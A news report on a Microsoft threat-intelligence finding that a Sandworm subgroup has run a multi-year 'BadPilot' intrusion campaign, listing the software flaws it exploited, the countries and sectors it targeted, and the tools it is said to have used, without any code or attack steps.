A subgroup of the notorious Russian state-sponsored hacking group Sandworm, also known as 'Seashell Blizzard' or 'APT44', has been conducting a sophisticated, multi-year cyber-espionage campaign named 'BadPilot', targeting a wide range of critical organizations and governments around the world.
According to a new report from Microsoft's Threat Intelligence team, the group has been active since at least 2021 and is responsible for breaching the networks of high-value sectors, including energy, oil and gas, telecommunications, shipping, arms manufacturing, and government agencies.
Sandworm, an advanced persistent threat (APT) group, is known for its relentless pursuit of access to sensitive networks, maintaining long-term presence, and enabling other subgroups with more specialized post-compromise skills to take over and execute high-value objectives. The group has been closely associated with the Russian Main Directorate of the General Staff of the Armed Forces (GRU) and has earned a reputation for conducting espionage and disruptive operations on a global scale.
The 'BadPilot' campaign involves a series of targeted cyberattacks leveraging vulnerabilities in widely used IT infrastructure software. The attackers have successfully exploited flaws in systems that facilitate remote management, including ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788), to expand their foothold in critical sectors in the United States, the United Kingdom, Ukraine, Europe, and Central and South Asia.
“Microsoft Threat Intelligence assesses that while some of the subgroup’s targeting is opportunistic, its compromises cumulatively offer Seashell Blizzard options when responding to Russia’s evolving strategic objectives. Since April 2022, Russia-aligned threat actors have increasingly targeted international organizations that are either geopolitically significant or provide military and/or political support to Ukraine,” the threat intelligence team noted in a blog post, adding that the subgroup has likely enabled at least three destructive cyberattacks in Ukraine since 2023.
Starting in 2024, the Sandworm subgroup used these vulnerabilities to compromise organizations across sectors by remotely accessing vulnerable systems. By employing techniques such as third-party internet scanning services and leveraging publicly available knowledge repositories, Seashell Blizzard was able to identify and breach networks at scale.
In addition to exploiting known vulnerabilities like Microsoft Exchange (CVE-2021-34473) and Zimbra Collaboration (CVE-2022-41352), the threat actor deployed custom web shells such as 'LocalOlive' to establish long-term persistence on affected systems. This persistence often allowed the group to maintain control of compromised networks and facilitate further exploitation.
By 2024, the 'BadPilot' subgroup began using legitimate IT remote management tools such as Atera Agent and Splashtop Remote Services to execute commands on compromised systems, effectively masquerading as IT administrators and avoiding detection by traditional security monitoring tools.
The group has also employed novel techniques for data exfiltration and command-and-control (C2) operations. One of the most notable methods was the use of the Tor network to route traffic, which concealed the actor’s activities by effectively cloaking inbound connections to compromised systems.
Further analysis has shown that the threat actor is utilizing tools like Procdump, Rclone, Chisel, and Plink to steal credentials and exfiltrate sensitive data through covert network tunnels. These tools allow the attackers to move laterally across compromised networks and exfiltrate large volumes of data without detection.
Earlier this week, EclecticIQ researchers warned that the Sandworm hackers ramped up their attacks on Ukrainian systems with a sophisticated malware campaign that exploits pirated software targeting Windows users in Ukraine with trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates.
